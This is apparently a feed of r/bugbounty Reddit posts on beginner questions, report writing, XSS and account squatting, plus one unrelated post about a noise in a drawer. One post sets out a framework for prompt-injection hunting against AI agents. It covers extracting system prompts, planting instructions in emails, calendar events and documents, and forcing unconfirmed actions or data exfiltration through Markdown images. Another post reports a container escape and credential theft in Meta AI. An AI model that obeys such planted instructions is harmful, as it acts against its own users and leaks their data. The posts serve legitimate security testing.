my approach in bug bounty

I literally waste my 2025 due to lack of discipline and misleading approach. In starting of 2025 i just waste the time of doing only tryhackme and other labs, and currently I decided to only read disclosed writeups and doing bug hunting on real world and in doing bug bounty I only pick 1 target in bugcrowd and observe how the application works like i go everywhere in application fetch every request with the help of burpsuite and see every paramter and understand each parameter working and also oberve how application react when I do the normal user actions and when i perform the unexpected actions. But in these I can't able to do xss because I only read xss blogs but doing bug hunting as i mentioned above due to this I am not able to test xss. I stucked that what I need to do, is my approach is in a right way or need some better modifications

https://redd.it/1pz8va8
@r_bugbounty

Is this suppose to happen..?

I recently just got home from college and I keep hearing this noise but I didn’t know where it was the first night and come the second night I had my dad check my room and he checked three different times and there was nothing around so now it’s the fourth night and there’s this running or like scratching noise inside my drawer, but there’s nothing inside the drawer or around or under so I believe that it’s inside the wood around the dressers. Do we know what this could be? should I be scared? or do I go to bed?

https://redd.it/1pzayqc
@r_bugbounty

From Desktop To Macos

hello guys i wanna ask you about switching from linux to macbook i have desktop pc is ryzen 5 3600 and rtx 3060 12 g and 16g ram and i want to switch to MacBook air m2 16 2022 because i got bored from learning in the same place i wanna start going outside to learn there’s no problem with macos

https://redd.it/1pzbe8z
@r_bugbounty

I found 7 critical Prompt Injection bugs in the last 2 months. Here is the framework I developed.

Hi everyone,

Over the last two months, I've been focusing heavily on AI-powered applications. After identifying 7 critical prompt injection bugs and quite a few low-hanging fruits, I wanted to share the framework I developed for hunting on these specific targets.

Here is my workflow:

### 1. Information Gathering

Just like any other target, you must first understand the system. The more you know about the architecture, the easier it is to spot vulnerabilities.

You need to identify three main factors:

* **Capabilities:** What can the app actually *do*? Can it modify sensitive info? Can it browse arbitrary domains?
* **Tools:** What tools does the AI agent have access to? (Simple test: Just ask the agent *"What tools do you have access to?"*, it will often list them).
* **Access:** What user data can the app read? Does it have access to your emails, calendar, Drive docs, etc.?

**Pro Tip:** Try to retrieve the system instructions.
> Getting the underlying system prompt gives you a clear map of how the AI is programmed to behave, its guardrails, and its limitations.

---

### 2. Injection Points

Map out every single input source the AI application can receive as data.

This takes many forms:

* **Documents:** Title, body content, headers/footers.
* **Calendar events:** Title, denoscription, attendees information.
* **Emails:** Subject, body text, attachments name/content.
...


You must test **EVERY** source to find a viable injection point.

The Workflow is really simple:
1. Plant a malicious instruction in an input source (e.g., an email sent to the victim).
2. Ask the AI to review or summarize that source.
3. If the AI executes the hidden instruction rather than just summarizing it, the app is likely vulnerable.

---

### 3. The Attack

Once you have an injection point, there are two main impact categories to investigate:

**A. Action Triggering**
Forcing the AI to take unconfirmed actions on a victim's account/data without their consent.
* *Examples:* Updating a calendar event, deleting an email, sending a Slack message, etc.

**B. Data Exfiltration**
Forcing the AI to send a victim's sensitive info to an external server you control.
* *Example:* Using Markdown image rendering to hit your server, [Joining Zoom meetings](https://arxiv.org/html/2508.12175v1#:~:text=5.5.2,User%20via%20Zoom%20), etc.

Based on your research in Step 1, identify high-value targets and construct your payloads accordingly.

It is not hard, but it requires a creative and persistent mindset.

---

### Resources

If you want to dive deeper, check out these presentations:

* [Hack to the Future (Kudelski Security)](https://kudelskisecurity.com/research/hack-to-the-future-slides-and-content)
* [Invitation Is All You Need (DEF CON 33)](https://arxiv.org/html/2508.12175v1)
* [When Guardrails Aren't Enough (Black Hat USA 25)](https://i.blackhat.com/BH-USA-25/Presentations/USA-25-Brauchler-When-Guardrails-Arent-Enough.pdf)

Thanks for reading. Happy hunting!

https://redd.it/1pzfo7t
@r_bugbounty

Should i trust chatgpt to learn cybersecurity?

Hey Reddit,

I’m interested in learning cybersecurity, but I’m debating how much I should rely on ChatGPT as a learning resource. I know it can explain concepts, give step-by-step guidance, and even simulate some labs, but I’m worried about:

* **Accuracy:** Could it give outdated or wrong info?
* **Depth:** Can it replace actual courses, books, or hands-on practice?
* **Safety:** If I follow its instructions, could I accidentally do something unsafe or illegal?

Has anyone here used ChatGPT to learn hacking, pentesting, or general cybersecurity skills? How reliable was it, and what would you recommend combining it with (labs, tutorials, YouTube, courses, etc.)?

I want to make sure I’m learning correctly without picking up bad habits or misinformation.

Thanks in advance!

https://redd.it/1pzgsej
@r_bugbounty

Selling WAHH 2
https://redd.it/1pzj5x0
@r_bugbounty

Meta rejected container escape + AWS creds as "safeguard bypass" - then patched everything


Found in Meta AI:
• Container escape to host
• AWS IMDS credential theft
• Root privesc (sudo NOPASSWD)
• Docker socket exposure
• Hardcoded AWS keys

Meta's response:
1. "AI hallucination" ❌
2. patches everything
3. "Safeguard bypass - not eligible" ❌

You don't patch hallucinations.
Container escape ≠ Prompt injection.

Full evidence thread:
https://x.com/zektheproisback/status/2005950750430495069

Anyone else experienced this?


https://redd.it/1pzfy6x
@r_bugbounty

What’s the best way to introduce someone to bug bounty?

Hi! For those who’ve taught bug bounty to a friend, sibling, or anyone else, how did you get them started? What did you teach first? And do you now collaborate on bug bounty hunting?

I’m asking because I jumped straight into bug bounty myself without really learning the fundamentals first, and while I got lucky and learned along the way, it was rough and led to a lot of burnout. I don’t want to put someone else through that, so I’m curious how others approached teaching it properly.

https://redd.it/1pzrx8t
@r_bugbounty

VDP Stored XSS on out-of-scope URL

I found a stored xss vulnerability on a subdomain on a VDP. I was confused by the scope saying :

*.theVulnerableWebsite.com (IN SCOPE)

but few lines after :

*.theSubdomain.theVulnerableWebsite.com (OUT OF SCOPE) <- which is the subdomain I exploited

It is too late and my payload is now stored and displayed on multiple pages of their site.

I reported it anyway but what could be the consequences ?

https://redd.it/1pzydnt
@r_bugbounty

How I'll write REPORTs without keyboard
https://redd.it/1q0602m
@r_bugbounty

I have a question regarding account squatting

So few weeks ago i was bug hunting on a site , it allowed free sign ups and i signed in with my email , the auth process seemed fine , but when changing the email address from inside the profile , the site changed the email address and sent a verification mail to the new email , some functions were blocked but i could set the 2fa to a mobile number or an app , this way i could effectively create and lock the victim's email if it was not registered before . Even if the victim tried to use forgot password option to change password, the 2fa made it impossible to recover


This was rated informational , but i think this qualifies for account squatting , can you give your thoughts ?

https://redd.it/1q05yhr
@r_bugbounty

Asking triagers About OWASP-A6-Security Misconfiguration

Is it relevant to make a report with this specific vulnerability when a complete OpenAPI specification for the backend is publicly accessible ?

In my case it reveals every admin/ internal/ endpoints, data structures (schemas) on a test backend.

https://redd.it/1q0db38
@r_bugbounty

Gemini prompt

I found a prompt in gemini that makes it loop and go forever without stoping can i get smt or no?

https://redd.it/1q0et0h
@r_bugbounty

Best way to write reports

Im a newbie and im looking at ways to efficiently write reports. Have seen some tools (ghostwriter, Sysreptor?) which helps in writing reports. What do y'all use for report writing?

https://redd.it/1q0fglj
@r_bugbounty

AI is quietly killing bug bounty hunting and most of you are pretending it’s not happening

Hey r/bugbounty,

I’ve been grinding bug bounty pretty seriously for about a year now (mostly private programs + a couple big public ones). I’ve found a handful of low/meds, a couple decent highs, but nothing life-changing. Honestly, it’s been way harder than I expected to land anything really good.

Lately I’ve been thinking a lot about why that is, and I’ve come to a conclusion that’s probably gonna piss a lot of people off: AI is already making apps dramatically harder to bug-hunt, and the impact is only going to get worse.

I know, I know "AI bad, Copilot writes trash code, haha devs still paste LLM output blindly.” Yeah that was true like 18-24 months ago. But we’re past that now. Modern AI-assisted coding (GitHub Copilot, Cursor, Claude Code, etc.) isn’t just autocomplete anymore, it’s generating entire features with proper input validation, auth checks, rate limiting, CSP headers, and even basic business logic sanity by default. Companies are also starting to run automated AI security reviews in CI/CD that catch a ton of the classic logic flaws we used to feast on.

The result? The low-hanging fruit is basically gone on anything built or maintained in the last year. IDORs are rarer, auth bypasses are rarer, payment logic bugs are rarer. Even stuff like SSRF and prototype pollution is getting caught earlier because the models have seen every public writeup ever.

I’m not saying bug bounty is dead tomorrow, but the golden era of “one weird trick → $10k critical” feels like it’s quietly ending. The people still printing money are either elite hackers finding crazy edge cases or folks with insane recon/game theory skills on niche targets. For the rest of us mortals? It’s getting brutal.

Most of the community seems to be in denial about this, lots of “AI slop” memes and dunking on junior devs using LLMs. But that’s coping. The truth is AI is raising the floor on application security faster than most hunters are raising their skills.

Change my mind. Or tell me I’m doomering too hard. I just needed to vent because I’m starting to wonder if I should pivot to something else before the payouts dry up completely.



https://redd.it/1q0gw8v
@r_bugbounty

Is it really oversaturated?

I was thinking about starting to learn it besides my data science specialization in a computer science college.

Because I am already passionate about cyber security more and I want to make some income.

So , my friend told me the field is full and oversaturated, is it true ?
( He isn't working in the field btw)

Thanks initially ❤️

https://redd.it/1q0el2v
@r_bugbounty

Reflected response in text/plain

The response reflects the input but content type is text/plain. Response is frameable and can be framed in one of the functionality of the site with same origin. Can it be forced to be rendered as html to execute XSS.

https://redd.it/1q0u11r
@r_bugbounty

B2B emails leak

Guys I have found 40+ leaked B2B(Business to Business) emails from my BBP target and I have found this without authentication, so my finding is a valid bug or not? Please guys help me i am new in bug bounty and also I am not able to trust AI for this.

https://redd.it/1q11m33
@r_bugbounty

When "valid actions" compose into invalid states: are state-machine flaws under-recognized in bug bounty?

The issue arises from a latent workflow integrity flaw in the subnoscription and credit lifecycle state machine.

While all individual actions are valid, authenticated, and permitted, the system allows a specific sequence of legitimate state transitions that results in an unintended long-lived backend state.

This state violates expected system invariants related to:

subnoscription ennoscriptments
promotional credit lifecycle enforcement
financial boundary conditions
No request tampering, API manipulation, or client-side validation bypass is required.

The flaw is exposed purely through allowed UI-driven flows, indicating a missing invariant enforcement at the state-transition level, not at the input-validation level.

Root Cause

Backend enforces local validations but not global workflow invariants
State transitions are validated individually, but not compositionally
No terminal guard prevents re-entry into promotional or credit-eligible states
Time-based and organizational lifecycle transitions are not reconciled against financial constraints
In effect, the system allows a valid transition graph that contains unintended cycles.

https://redd.it/1q12vqk
@r_bugbounty

5 Vulnerabilities Chain That Hacked Netgear Router
https://youtu.be/24P7g8nM8T0

https://redd.it/1q16hnq
@r_bugbounty

Weekly Beginner / Newbie Q&A

New to bug bounty? Ask about roadmaps, resources, certifications, getting started, or any beginner-level questions here!

Recommendations for Posting:

Be Specific: Clearly state your question or what you need help with (e.g., learning path advice, resource recommendations, certification insights).
Keep It Concise: Ask focused questions to get the most relevant answers (less is more).
Note Your Skill Level: Mention if you’re a complete beginner or have some basic knowledge.

Guidelines:

Be respectful and open to feedback.
Ask clear, specific questions to receive the best advice.
Engage actively - check back for responses and ask follow-ups if needed.

Example Post:

"Hi, I’m new to bug bounty with no experience. What are the best free resources for learning web vulnerabilities? Is eJPT a good starting certification? Looking for a beginner roadmap."

Post your questions below and let’s grow in the bug bounty community!

https://redd.it/1q17i0v
@r_bugbounty